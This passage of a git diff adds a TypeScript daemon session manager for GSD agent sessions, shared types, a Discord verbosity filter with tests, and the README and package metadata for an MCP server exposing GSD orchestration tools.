+   * Start a new GSD auto-mode session for the given project directory.
+   *
+   * Rejects if an ACTIVE session (starting/running/blocked) already exists
+   * for this projectDir; a previous session in a terminal state (completed/
+   * error/cancelled) is evicted so the project can be re-run.
+   * Creates an RpcClient, starts the process, performs the v2 init handshake,
+   * wires event tracking, and sends '/gsd auto' to begin execution.
+   *
+   * @returns the sessionId assigned by the CLI during init
+   */
+  async startSession(options: StartSessionOptions): Promise<string> {
+    const { projectDir } = options;
+
+    if (!projectDir || projectDir.trim() === '') {
+      throw new Error('projectDir is required and cannot be empty');
+    }
+
+    const resolvedDir = resolve(projectDir);
+    const projectName = basename(resolvedDir);
+
+    const existing = this.sessions.get(resolvedDir);
+    if (existing) {
+      const active =
+        existing.status === 'starting' ||
+        existing.status === 'running' ||
+        existing.status === 'blocked';
+      if (active) {
+        throw new Error(
+          `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})`
+        );
+      }
+      // Previous run reached a terminal state — evict it so the project can
+      // be started again. Without this, one finished/failed run permanently
+      // blocked all future sessions for the same directory.
+      existing.unsubscribe?.();
+      this.sessions.delete(resolvedDir);
+    }
+
+    const cliPath = options.cliPath ?? SessionManager.resolveCLIPath();
+
+    const args: string[] = ['--mode', 'rpc'];
+    if (options.model) args.push('--model', options.model);
+    if (options.bare) args.push('--bare');
+
+    const client = new RpcClient({
+      cliPath,
+      cwd: resolvedDir,
+      args,
+    });
+
+    // Build the session shell before async operations so we can track state
+    const session: ManagedSession = {
+      sessionId: '', // filled after init
+      projectDir: resolvedDir,
+      projectName,
+      status: 'starting',
+      client,
+      events: [],
+      pendingBlocker: null,
+      cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } },
+      startTime: Date.now(),
+    };
+
+    // Insert into map early (keyed by dir) so concurrent starts are rejected
+    this.sessions.set(resolvedDir, session);
+
+    try {
+      // Start the process with timeout
+      await Promise.race([
+        client.start(),
+        timeout(INIT_TIMEOUT_MS, `RpcClient.start() timed out after ${INIT_TIMEOUT_MS}ms`),
+      ]);
+
+      // Perform v2 init handshake
+      const initResult: RpcInitResult = await Promise.race([
+        client.init(),
+        timeout(INIT_TIMEOUT_MS, `RpcClient.init() timed out after ${INIT_TIMEOUT_MS}ms`),
+      ]) as RpcInitResult;
+
+      session.sessionId = initResult.sessionId;
+      session.status = 'running';
+
+      // Wire event tracking
+      session.unsubscribe = client.onEvent((event: SdkAgentEvent) => {
+        this.handleEvent(session, event);
+      });
+
+      // Kick off auto-mode
+      const command = options.command ?? '/gsd auto';
+      await client.prompt(command);
+
+      this.logger.info('session started', { sessionId: session.sessionId, projectDir: resolvedDir });
+      this.emit('session:started', { sessionId: session.sessionId, projectDir: resolvedDir, projectName });
+
+      return session.sessionId;
+    } catch (err) {
+      session.status = 'error';
+      session.error = err instanceof Error ? err.message : String(err);
+
+      // Attempt cleanup
+      try { await client.stop(); } catch { /* swallow cleanup errors */ }
+
+      this.logger.error('session error', { sessionId: session.sessionId, projectDir: resolvedDir, error: session.error });
+      this.emit('session:error', { sessionId: session.sessionId, projectDir: resolvedDir, projectName, error: session.error });
+
+      // Keep session in map so callers can inspect the error; it is evicted
+      // automatically on the next startSession() for this directory.
+      throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`);
+    }
+  }
+
+  /**
+   * Look up a session by sessionId.
+   * Linear scan is fine — we expect <10 concurrent sessions.
+   */
+  getSession(sessionId: string): ManagedSession | undefined {
+    for (const session of this.sessions.values()) {
+      if (session.sessionId === sessionId) return session;
+    }
+    return undefined;
+  }
+
+  /**
+   * Look up a session by project directory (direct map lookup).
+   */
+  getSessionByDir(projectDir: string): ManagedSession | undefined {
+    return this.sessions.get(resolve(projectDir));
+  }
+
+  /**
+   * Return all tracked sessions (R035 — cross-project status).
+   */
+  getAllSessions(): ManagedSession[] {
+    return Array.from(this.sessions.values());
+  }
+
+  /**
+   * Resolve a pending blocker by sending a UI response.
+   *
+   * @throws if the session is unknown or has no pending blocker
+   */
+  async resolveBlocker(sessionId: string, response: string): Promise<void> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+    if (!session.pendingBlocker) throw new Error(`No pending blocker for session ${sessionId}`);
+
+    const blocker = session.pendingBlocker;
+    session.client.sendUIResponse(blocker.id, { value: response });
+    session.pendingBlocker = null;
+    if (session.status === 'blocked') {
+      session.status = 'running';
+    }
+
+    this.logger.info('blocker resolved', {
+      sessionId,
+      projectDir: session.projectDir,
+      blockerId: blocker.id,
+      blockerMethod: blocker.method,
+    });
+  }
+
+  /**
+   * Cancel a running session — abort current operation then stop the process.
+   * The session stays in the map (status 'cancelled') so getResult() still
+   * works; it is evicted on the next startSession() for the same directory.
+   */
+  async cancelSession(sessionId: string): Promise<void> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+
+    try {
+      await session.client.abort();
+    } catch { /* may already be stopped */ }
+
+    try {
+      await session.client.stop();
+    } catch { /* swallow */ }
+
+    session.status = 'cancelled';
+    session.unsubscribe?.();
+
+    this.logger.info('session cancelled', { sessionId, projectDir: session.projectDir });
+  }
+
+  /**
+   * Build a HeadlessJsonResult-shaped object from accumulated session state.
+   */
+  getResult(sessionId: string): Record<string, unknown> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+
+    const durationMs = Date.now() - session.startTime;
+
+    return {
+      sessionId: session.sessionId,
+      projectDir: session.projectDir,
+      projectName: session.projectName,
+      status: session.status,
+      durationMs,
+      cost: session.cost,
+      recentEvents: session.events.slice(-10),
+      pendingBlocker: session.pendingBlocker
+        ? { id: session.pendingBlocker.id, method: session.pendingBlocker.method, message: session.pendingBlocker.message }
+        : null,
+      error: session.error ?? null,
+    };
+  }
+
+  /**
+   * Stop all active sessions and clean up resources.
+   */
+  async cleanup(): Promise<void> {
+    const stopPromises: Promise<void>[] = [];
+
+    for (const session of this.sessions.values()) {
+      session.unsubscribe?.();
+      if (session.status === 'running' || session.status === 'starting' || session.status === 'blocked') {
+        stopPromises.push(
+          session.client.stop().catch(() => { /* swallow */ })
+        );
+        session.status = 'cancelled';
+      }
+    }
+
+    await Promise.allSettled(stopPromises);
+  }
+
+  /**
+   * Resolve the GSD CLI path.
+   *
+   * 1. GSD_CLI_PATH env var (highest priority)
+   * 2. `which gsd` — resolve the binary found on PATH
+   *
+   * @throws when neither source yields a path
+   */
+  static resolveCLIPath(): string {
+    const envPath = process.env['GSD_CLI_PATH'];
+    if (envPath) return resolve(envPath);
+
+    try {
+      const gsdBin = execSync('which gsd', { encoding: 'utf-8' }).trim();
+      if (gsdBin) return resolve(gsdBin);
+    } catch {
+      // which failed
+    }
+
+    throw new Error(
+      'Cannot find GSD CLI. Set GSD_CLI_PATH environment variable or ensure `gsd` is in PATH.'
+    );
+  }
+
+  // ---------------------------------------------------------------------------
+  // Private: Event Handling
+  // ---------------------------------------------------------------------------
+
+  private handleEvent(session: ManagedSession, event: SdkAgentEvent): void {
+    // Ring buffer: push and trim
+    session.events.push(event);
+    if (session.events.length > MAX_EVENTS) {
+      session.events.splice(0, session.events.length - MAX_EVENTS);
+    }
+
+    // Forward event to listeners
+    this.logger.debug('session event', { sessionId: session.sessionId, type: (event as Record<string, unknown>).type as string });
+    this.emit('session:event', { sessionId: session.sessionId, projectDir: session.projectDir, event });
+
+    // Cost tracking (K004 — cumulative-max)
+    if ((event as Record<string, unknown>).type === 'cost_update') {
+      const costEvent = event as unknown as RpcCostUpdateEvent;
+      session.cost.totalCost = Math.max(session.cost.totalCost, costEvent.cumulativeCost ?? 0);
+      if (costEvent.tokens) {
+        session.cost.tokens.input = Math.max(session.cost.tokens.input, costEvent.tokens.input ?? 0);
+        session.cost.tokens.output = Math.max(session.cost.tokens.output, costEvent.tokens.output ?? 0);
+        session.cost.tokens.cacheRead = Math.max(session.cost.tokens.cacheRead, costEvent.tokens.cacheRead ?? 0);
+        session.cost.tokens.cacheWrite = Math.max(session.cost.tokens.cacheWrite, costEvent.tokens.cacheWrite ?? 0);
+      }
+    }
+
+    // Terminal detection — auto-mode/step-mode stopped
+    if (isTerminalNotification(event as Record<string, unknown>)) {
+      if (isBlockedNotification(event as Record<string, unknown>)) {
+        session.status = 'blocked';
+        // NOTE(review): this is a notify-style event and may not carry a
+        // ui-request id; if so, resolveBlocker() would respond with an empty
+        // id — confirm against the RPC protocol.
+        session.pendingBlocker = extractBlocker(event);
+        this.logger.info('session blocked', {
+          sessionId: session.sessionId,
+          projectDir: session.projectDir,
+          blockerId: session.pendingBlocker.id,
+          blockerMethod: session.pendingBlocker.method,
+        });
+        this.emit('session:blocked', {
+          sessionId: session.sessionId,
+          projectDir: session.projectDir,
+          projectName: session.projectName,
+          blocker: session.pendingBlocker,
+        });
+      } else {
+        session.status = 'completed';
+        session.unsubscribe?.();
+        this.logger.info('session completed', { sessionId: session.sessionId, projectDir: session.projectDir });
+        this.emit('session:completed', {
+          sessionId: session.sessionId,
+          projectDir: session.projectDir,
+          projectName: session.projectName,
+        });
+      }
+      return;
+    }
+
+    // Blocker detection — non-fire-and-forget extension_ui_request
+    if (isBlockingUIRequest(event as Record<string, unknown>)) {
+      session.status = 'blocked';
+      session.pendingBlocker = extractBlocker(event);
+      this.logger.info('session blocked', {
+        sessionId: session.sessionId,
+        projectDir: session.projectDir,
+        blockerId: session.pendingBlocker.id,
+        blockerMethod: session.pendingBlocker.method,
+      });
+      this.emit('session:blocked', {
+        sessionId: session.sessionId,
+        projectDir: session.projectDir,
+        projectName: session.projectName,
+        blocker: session.pendingBlocker,
+      });
+    }
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+/** Promise that rejects with `message` after `ms`. Never resolves. */
+function timeout(ms: number, message: string): Promise<never> {
+  return new Promise((_, reject) => {
+    const timer = setTimeout(() => reject(new Error(message)), ms);
+    // Don't let a pending init-timeout keep the daemon's event loop alive
+    // for up to 30s after the race has already been won by the real op.
+    timer.unref?.();
+  });
+}
+
+/** Normalize a blocking extension_ui_request event into a PendingBlocker. */
+function extractBlocker(event: SdkAgentEvent): PendingBlocker {
+  const uiEvent = event as unknown as
RpcExtensionUIRequest;
+  return {
+    id: String(uiEvent.id ?? ''),
+    method: String(uiEvent.method ?? ''),
+    message: String((uiEvent as unknown as Record<string, unknown>).title ?? (uiEvent as unknown as Record<string, unknown>).message ?? ''),
+    event: uiEvent,
+  };
+}
diff --git a/packages/daemon/src/types.ts b/packages/daemon/src/types.ts
new file mode 100644
index 000000000..822d1ff9b
--- /dev/null
+++ b/packages/daemon/src/types.ts
@@ -0,0 +1,199 @@
+import type { RpcClient, SdkAgentEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client';
+
+/**
+ * Log severity levels, ordered from most to least verbose.
+ */
+export type LogLevel = 'debug' | 'info' | 'warn' | 'error';
+
+/**
+ * Per-channel verbosity for Discord event streaming.
+ * - 'default': tool calls, messages, transitions, blockers, errors, completions
+ * - 'verbose': everything including cost_update and status events
+ * - 'quiet': only blockers, errors, completions
+ */
+export type VerbosityLevel = 'default' | 'verbose' | 'quiet';
+
+/**
+ * A single structured log entry written as JSON-lines.
+ */
+export interface LogEntry {
+  /** ISO-8601 timestamp */
+  ts: string;
+  level: LogLevel;
+  msg: string;
+  data?: Record<string, unknown>;
+}
+
+/**
+ * Top-level daemon configuration, loaded from YAML.
+ */
+export interface DaemonConfig {
+  discord?: {
+    token: string;
+    guild_id: string;
+    owner_id: string;
+    /** When true, DM the owner on blocker events in addition to channel messages */
+    dm_on_blocker?: boolean;
+    /** Discord channel ID where the orchestrator listens for natural language commands */
+    control_channel_id?: string;
+    /** LLM orchestrator settings */
+    orchestrator?: {
+      model?: string;
+      max_tokens?: number;
+    };
+  };
+  projects: {
+    scan_roots: string[];
+  };
+  log: {
+    file: string;
+    level: LogLevel;
+    max_size_mb: number;
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Session Status
+// ---------------------------------------------------------------------------
+
+export type SessionStatus = 'starting' | 'running' | 'blocked' | 'completed' | 'error' | 'cancelled';
+
+// ---------------------------------------------------------------------------
+// Managed Session
+// ---------------------------------------------------------------------------
+
+/**
+ * A daemon-managed GSD headless session.
+ */
+export interface ManagedSession {
+  /** Unique session ID returned from RpcClient.init() */
+  sessionId: string;
+
+  /** Absolute path to the project directory */
+  projectDir: string;
+
+  /** Human-readable project name (basename of projectDir) */
+  projectName: string;
+
+  /** Current lifecycle status */
+  status: SessionStatus;
+
+  /** The RpcClient instance managing the agent process */
+  client: RpcClient;
+
+  /** Ring buffer of recent events (capped at MAX_EVENTS) */
+  events: SdkAgentEvent[];
+
+  /** Pending blocker requiring user response, if any */
+  pendingBlocker: PendingBlocker | null;
+
+  /** Cumulative cost tracking (max pattern per K004) */
+  cost: CostAccumulator;
+
+  /** Session start timestamp (epoch ms, from Date.now()) */
+  startTime: number;
+
+  /** Error message if status is 'error' */
+  error?: string;
+
+  /** Cleanup function to unsubscribe from events */
+  unsubscribe?: () => void;
+}
+
+// ---------------------------------------------------------------------------
+// Pending Blocker
+// ---------------------------------------------------------------------------
+
+export interface PendingBlocker {
+  /** The extension_ui_request id */
+  id: string;
+
+  /** The request method (e.g. 'select', 'confirm', 'input') */
+  method: string;
+
+  /** Human-readable message or title */
+  message: string;
+
+  /** Full event payload for inspection */
+  event: RpcExtensionUIRequest;
+}
+
+// ---------------------------------------------------------------------------
+// Cost Accumulator (K004 — cumulative-max)
+// ---------------------------------------------------------------------------
+
+export interface CostAccumulator {
+  totalCost: number;
+  tokens: {
+    input: number;
+    output: number;
+    cacheRead: number;
+    cacheWrite: number;
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Project Info — scanner output
+// ---------------------------------------------------------------------------
+
+/** Marker types detectable by the project scanner */
+export type ProjectMarker = 'git' | 'node' | 'gsd' | 'rust' | 'python' | 'go';
+
+export interface ProjectInfo {
+  /** Directory name (basename) */
+  name: string;
+
+  /** Absolute path to the project directory */
+  path: string;
+
+  /** Detected marker types */
+  markers: ProjectMarker[];
+
+  /** Most recent mtime of detected marker files/dirs (epoch ms) */
+  lastModified: number;
+}
+
+// ---------------------------------------------------------------------------
+// Start Session Options
+// ---------------------------------------------------------------------------
+
+export interface StartSessionOptions {
+  /** Absolute path to the project directory */
+  projectDir: string;
+
+  /** Command to send after '/gsd auto' (default: none) */
+  command?: string;
+
+  /** Model ID override */
+  model?: string;
+
+  /** Run in bare mode (skip user config) */
+  bare?: boolean;
+
+  /** Path to CLI binary (overrides GSD_CLI_PATH and which resolution) */
+  cliPath?: string;
+}
+
+// ---------------------------------------------------------------------------
+// Formatted Event — output of event-formatter.ts
+// ---------------------------------------------------------------------------
+
+/**
+ * Formatted Discord message payload for a GSD event.
+ * content is the plain-text fallback; embeds and components are optional.
+ */
+export interface FormattedEvent {
+  content: string;
+  embed?: import('discord.js').EmbedBuilder;
+  components?: import('discord.js').ActionRowBuilder[];
+}
+
+// ---------------------------------------------------------------------------
+// Constants
+// ---------------------------------------------------------------------------
+
+/** Maximum number of events kept in the ring buffer (larger than mcp-server's 50 — daemon forwards events to Discord) */
+export const MAX_EVENTS = 100;
+
+/** Timeout for RpcClient initialization (ms) */
+export const INIT_TIMEOUT_MS = 30_000;
diff --git a/packages/daemon/src/verbosity.test.ts b/packages/daemon/src/verbosity.test.ts
new file mode 100644
index 000000000..42c61e9b6
--- /dev/null
+++ b/packages/daemon/src/verbosity.test.ts
@@ -0,0 +1,171 @@
+import { describe, it, beforeEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { VerbosityManager, shouldShowAtLevel } from './verbosity.js';
+
+// ---------------------------------------------------------------------------
+// VerbosityManager
+// ---------------------------------------------------------------------------
+
+describe('VerbosityManager', () => {
+  let vm: VerbosityManager;
+
+  beforeEach(() => {
+    vm = new VerbosityManager();
+  });
+
+  it('returns default level for unknown channel', () => {
+    assert.equal(vm.getLevel('chan-1'), 'default');
+  });
+
+  it('set/get round-trips', () => {
+    vm.setLevel('chan-1', 'quiet');
+    assert.equal(vm.getLevel('chan-1'), 'quiet');
+    vm.setLevel('chan-1', 'verbose');
+    assert.equal(vm.getLevel('chan-1'), 'verbose');
+  });
+
+  it('different channels are independent', () => {
+    vm.setLevel('chan-a', 'quiet');
+    vm.setLevel('chan-b', 'verbose');
+    assert.equal(vm.getLevel('chan-a'), 'quiet');
assert.equal(vm.getLevel('chan-b'), 'verbose'); + assert.equal(vm.getLevel('chan-c'), 'default'); + }); + + it('shouldShow delegates to the level-based filter', () => { + vm.setLevel('chan-q', 'quiet'); + assert.equal(vm.shouldShow('chan-q', 'tool_execution_start'), false); + assert.equal(vm.shouldShow('chan-q', 'extension_ui_request'), true); + }); +}); + +// --------------------------------------------------------------------------- +// shouldShowAtLevel — quiet +// --------------------------------------------------------------------------- + +describe('shouldShowAtLevel — quiet', () => { + const level = 'quiet' as const; + + it('shows blockers', () => { + assert.equal(shouldShowAtLevel(level, 'extension_ui_request'), true); + }); + + it('shows execution_complete', () => { + assert.equal(shouldShowAtLevel(level, 'execution_complete'), true); + }); + + it('shows error', () => { + assert.equal(shouldShowAtLevel(level, 'error'), true); + }); + + it('shows session_error', () => { + assert.equal(shouldShowAtLevel(level, 'session_error'), true); + }); + + it('hides tool calls', () => { + assert.equal(shouldShowAtLevel(level, 'tool_execution_start'), false); + assert.equal(shouldShowAtLevel(level, 'tool_execution_end'), false); + }); + + it('hides messages', () => { + assert.equal(shouldShowAtLevel(level, 'message_start'), false); + assert.equal(shouldShowAtLevel(level, 'message'), false); + }); + + it('hides cost_update', () => { + assert.equal(shouldShowAtLevel(level, 'cost_update'), false); + }); + + it('hides task_transition', () => { + assert.equal(shouldShowAtLevel(level, 'task_transition'), false); + }); + + it('hides unknown events', () => { + assert.equal(shouldShowAtLevel(level, 'totally_random'), false); + }); +}); + +// --------------------------------------------------------------------------- +// shouldShowAtLevel — default +// --------------------------------------------------------------------------- + +describe('shouldShowAtLevel — default', () => { + 
const level = 'default' as const; + + it('shows blockers', () => { + assert.equal(shouldShowAtLevel(level, 'extension_ui_request'), true); + }); + + it('shows execution_complete', () => { + assert.equal(shouldShowAtLevel(level, 'execution_complete'), true); + }); + + it('shows error', () => { + assert.equal(shouldShowAtLevel(level, 'error'), true); + }); + + it('shows tool calls', () => { + assert.equal(shouldShowAtLevel(level, 'tool_execution_start'), true); + assert.equal(shouldShowAtLevel(level, 'tool_execution_end'), true); + }); + + it('shows messages', () => { + assert.equal(shouldShowAtLevel(level, 'message_start'), true); + assert.equal(shouldShowAtLevel(level, 'message_end'), true); + assert.equal(shouldShowAtLevel(level, 'message'), true); + }); + + it('shows task_transition', () => { + assert.equal(shouldShowAtLevel(level, 'task_transition'), true); + }); + + it('shows session_started', () => { + assert.equal(shouldShowAtLevel(level, 'session_started'), true); + }); + + it('hides cost_update', () => { + assert.equal(shouldShowAtLevel(level, 'cost_update'), false); + }); + + it('hides status events', () => { + assert.equal(shouldShowAtLevel(level, 'state_update'), false); + assert.equal(shouldShowAtLevel(level, 'status'), false); + }); + + it('hides unknown events', () => { + assert.equal(shouldShowAtLevel(level, 'something_weird'), false); + }); +}); + +// --------------------------------------------------------------------------- +// shouldShowAtLevel — verbose +// --------------------------------------------------------------------------- + +describe('shouldShowAtLevel — verbose', () => { + const level = 'verbose' as const; + + it('shows everything that quiet/default show', () => { + const events = [ + 'extension_ui_request', 'execution_complete', 'error', 'session_error', + 'tool_execution_start', 'tool_execution_end', 'message_start', 'message_end', + 'message', 'task_transition', 'session_started', + ]; + for (const e of events) { + 
assert.equal(shouldShowAtLevel(level, e), true, `Expected verbose to show ${e}`);
+    }
+  });
+
+  it('shows cost_update', () => {
+    assert.equal(shouldShowAtLevel(level, 'cost_update'), true);
+  });
+
+  it('shows status events', () => {
+    assert.equal(shouldShowAtLevel(level, 'state_update'), true);
+    assert.equal(shouldShowAtLevel(level, 'status'), true);
+    assert.equal(shouldShowAtLevel(level, 'set_status'), true);
+  });
+
+  it('shows unknown/arbitrary events', () => {
+    assert.equal(shouldShowAtLevel(level, 'something_arbitrary'), true);
+  });
+});
diff --git a/packages/daemon/src/verbosity.ts b/packages/daemon/src/verbosity.ts
new file mode 100644
index 000000000..e40b11c87
--- /dev/null
+++ b/packages/daemon/src/verbosity.ts
@@ -0,0 +1,101 @@
+/**
+ * verbosity.ts — Per-channel verbosity filter for Discord event streaming.
+ *
+ * Controls which RPC event types reach each Discord channel.
+ * Three levels:
+ * - 'quiet': blockers, errors, completions only
+ * - 'default': tool calls, messages, transitions, blockers, errors, completions
+ * - 'verbose': everything (adds cost_update, status, generic events)
+ */
+
+import type { VerbosityLevel } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Event classification
+// ---------------------------------------------------------------------------
+
+/** Event types that are always shown (even in quiet mode). */
+const ALWAYS_SHOWN: ReadonlySet<string> = new Set([
+  'extension_ui_request', // blockers
+  'execution_complete',
+  'error',
+  'session_error',
+]);
+
+/** Event types shown at default level and above. */
+const DEFAULT_SHOWN: ReadonlySet<string> = new Set([
+  'tool_execution_start',
+  'tool_execution_end',
+  'message_start',
+  'message_end',
+  'message',
+  'task_transition',
+  'session_started',
+]);
+
+/**
+ * Event types shown only at verbose level.
+ * Informational — shouldShowAtLevel never consults this set, since verbose
+ * shows every event type unconditionally.
+ */
+const VERBOSE_ONLY: ReadonlySet<string> = new Set([
+  'cost_update',
+  'state_update',
+  'status',
+  'set_status',
+  'set_widget',
+  'set_title',
+]);
+
+// ---------------------------------------------------------------------------
+// VerbosityManager
+// ---------------------------------------------------------------------------
+
+export class VerbosityManager {
+  private levels: Map<string, VerbosityLevel> = new Map();
+
+  /** Get the verbosity level for a channel. Defaults to 'default'. */
+  getLevel(channelId: string): VerbosityLevel {
+    return this.levels.get(channelId) ?? 'default';
+  }
+
+  /** Set the verbosity level for a channel. */
+  setLevel(channelId: string, level: VerbosityLevel): void {
+    this.levels.set(channelId, level);
+  }
+
+  /**
+   * Determine whether an event of the given type should be shown
+   * in the specified channel.
+   */
+  shouldShow(channelId: string, eventType: string): boolean {
+    const level = this.getLevel(channelId);
+    return shouldShowAtLevel(level, eventType);
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Pure filter — exported for direct use and testability
+// ---------------------------------------------------------------------------
+
+/**
+ * Pure predicate: should an event of this type be shown at the given verbosity level?
+ */
+export function shouldShowAtLevel(level: VerbosityLevel, eventType: string): boolean {
+  // Always-shown events pass through regardless of level
+  if (ALWAYS_SHOWN.has(eventType)) return true;
+
+  switch (level) {
+    case 'quiet':
+      // Quiet only shows ALWAYS_SHOWN events
+      return false;
+
+    case 'default':
+      // Default shows ALWAYS_SHOWN + DEFAULT_SHOWN
+      return DEFAULT_SHOWN.has(eventType);
+
+    case 'verbose':
+      // Verbose shows everything
+      return true;
+
+    default:
+      // Unknown level → treat as default
+      return DEFAULT_SHOWN.has(eventType);
+  }
+}
diff --git a/packages/daemon/tsconfig.json b/packages/daemon/tsconfig.json
new file mode 100644
index 000000000..779b48aca
--- /dev/null
+++ b/packages/daemon/tsconfig.json
@@ -0,0 +1,24 @@
+{
+  "compilerOptions": {
+    "target": "ES2024",
+    "module": "Node16",
+    "lib": ["ES2024"],
+    "strict": true,
+    "esModuleInterop": true,
+    "skipLibCheck": true,
+    "forceConsistentCasingInFileNames": true,
+    "declaration": true,
+    "declarationMap": true,
+    "sourceMap": true,
+    "inlineSources": true,
+    "inlineSourceMap": false,
+    "moduleResolution": "Node16",
+    "resolveJsonModule": true,
+    "allowImportingTsExtensions": false,
+    "types": ["node"],
+    "outDir": "./dist",
+    "rootDir": "./src"
+  },
+  "include": ["src/**/*.ts"],
+  "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"]
+}
diff --git a/packages/mcp-server/.npmignore b/packages/mcp-server/.npmignore
new file mode 100644
index 000000000..5aedf8f6e
--- /dev/null
+++ b/packages/mcp-server/.npmignore
@@ -0,0 +1 @@
+dist/*.test.*
diff --git a/packages/mcp-server/README.md b/packages/mcp-server/README.md
new file mode 100644
index 000000000..fd4783ea9
--- /dev/null
+++ b/packages/mcp-server/README.md
@@ -0,0 +1,202 @@
+# @gsd-build/mcp-server
+
+MCP server exposing GSD orchestration tools for Claude Code, Cursor, and other MCP-compatible clients.
+ +Start GSD auto-mode sessions, poll progress, resolve blockers, and retrieve results — all through the [Model Context Protocol](https://modelcontextprotocol.io/). + +## Installation + +```bash +npm install @gsd-build/mcp-server +``` + +Or with the monorepo workspace: + +```bash +# Already available as a workspace package +npx gsd-mcp-server +``` + +## Configuration + +### Claude Code + +Add to your project's `.mcp.json`: + +```json +{ + "mcpServers": { + "gsd": { + "command": "npx", + "args": ["gsd-mcp-server"], + "env": { + "GSD_CLI_PATH": "/path/to/gsd" + } + } + } +} +``` + +Or if installed globally: + +```json +{ + "mcpServers": { + "gsd": { + "command": "gsd-mcp-server" + } + } +} +``` + +### Cursor + +Add to `.cursor/mcp.json`: + +```json +{ + "mcpServers": { + "gsd": { + "command": "npx", + "args": ["gsd-mcp-server"], + "env": { + "GSD_CLI_PATH": "/path/to/gsd" + } + } + } +} +``` + +## Tools + +### `gsd_execute` + +Start a GSD auto-mode session for a project directory. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `projectDir` | `string` | ✅ | Absolute path to the project directory | +| `command` | `string` | | Command to send (default: `"/gsd auto"`) | +| `model` | `string` | | Model ID override | +| `bare` | `boolean` | | Run in bare mode (skip user config) | + +**Returns:** `{ sessionId, status: "started" }` + +### `gsd_status` + +Poll the current status of a running GSD session. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` | + +**Returns:** + +```json +{ + "status": "running", + "progress": { "eventCount": 42, "toolCalls": 15 }, + "recentEvents": [ ... ], + "pendingBlocker": null, + "cost": { "totalCost": 0.12, "tokens": { "input": 5000, "output": 2000, "cacheRead": 1000, "cacheWrite": 500 } }, + "durationMs": 45000 +} +``` + +### `gsd_result` + +Get the accumulated result of a session. 
Works for both running (partial) and completed sessions. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` | + +**Returns:** + +```json +{ + "sessionId": "abc-123", + "projectDir": "/path/to/project", + "status": "completed", + "durationMs": 120000, + "cost": { ... }, + "recentEvents": [ ... ], + "pendingBlocker": null, + "error": null +} +``` + +### `gsd_cancel` + +Cancel a running session. Aborts the current operation and stops the agent process. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` | + +**Returns:** `{ cancelled: true }` + +### `gsd_query` + +Query GSD project state from the filesystem without an active session. Returns STATE.md, PROJECT.md, requirements, and milestone listing. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `projectDir` | `string` | ✅ | Absolute path to the project directory | +| `query` | `string` | ✅ | What to query (e.g. `"status"`, `"milestones"`) | + +**Returns:** + +```json +{ + "projectDir": "/path/to/project", + "state": "...", + "project": "...", + "requirements": "...", + "milestones": [ + { "id": "M001", "hasRoadmap": true, "hasSummary": false } + ] +} +``` + +### `gsd_resolve_blocker` + +Resolve a pending blocker in a session by sending a response to the blocked UI request. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` | +| `response` | `string` | ✅ | Response to send for the pending blocker | + +**Returns:** `{ resolved: true }` + +## Environment Variables + +| Variable | Description | +|----------|-------------| +| `GSD_CLI_PATH` | Absolute path to the GSD CLI binary. If not set, the server resolves `gsd` via `which`. 
| + +## Architecture + +``` +┌─────────────────┐ stdio ┌──────────────────┐ +│ MCP Client │ ◄────────────► │ @gsd-build/mcp-server │ +│ (Claude Code, │ JSON-RPC │ │ +│ Cursor, etc.) │ │ SessionManager │ +└─────────────────┘ │ │ │ + │ ▼ │ + │ @gsd-build/rpc-client │ + │ │ │ + │ ▼ │ + │ GSD CLI (child │ + │ process via RPC)│ + └──────────────────┘ +``` + +- **@gsd-build/mcp-server** — MCP protocol adapter. Translates MCP tool calls into SessionManager operations. +- **SessionManager** — Manages RpcClient lifecycle. One session per project directory. Tracks events in a ring buffer (last 50), detects blockers, accumulates cost. +- **@gsd-build/rpc-client** — Low-level RPC client that spawns and communicates with the GSD CLI process via JSON-RPC over stdio. + +## License + +MIT diff --git a/packages/mcp-server/package.json b/packages/mcp-server/package.json new file mode 100644 index 000000000..449a074de --- /dev/null +++ b/packages/mcp-server/package.json @@ -0,0 +1,46 @@ +{ + "name": "@gsd-build/mcp-server", + "version": "2.52.0", + "description": "MCP server exposing GSD orchestration tools for Claude Code, Cursor, and other MCP clients", + "license": "MIT", + "repository": { + "type": "git", + "url": "https://github.com/gsd-build/gsd-2.git", + "directory": "packages/mcp-server" + }, + "publishConfig": { + "access": "public" + }, + "type": "module", + "main": "./dist/index.js", + "types": "./dist/index.d.ts", + "exports": { + ".": { + "types": "./dist/index.d.ts", + "import": "./dist/index.js" + } + }, + "bin": { + "gsd-mcp-server": "./dist/cli.js" + }, + "scripts": { + "build": "tsc", + "test": "node --test dist/mcp-server.test.js" + }, + "dependencies": { + "@modelcontextprotocol/sdk": "^1.27.1", + "@gsd-build/rpc-client": "^2.52.0", + "zod": "^4.0.0" + }, + "devDependencies": { + "@types/node": "^24.12.0", + "typescript": "^5.4.0" + }, + "engines": { + "node": ">=22.0.0" + }, + "files": [ + "dist", + "!dist/**/*.test.*" + ] +} diff --git 
a/packages/mcp-server/src/cli.ts b/packages/mcp-server/src/cli.ts
new file mode 100644
index 000000000..744749d03
--- /dev/null
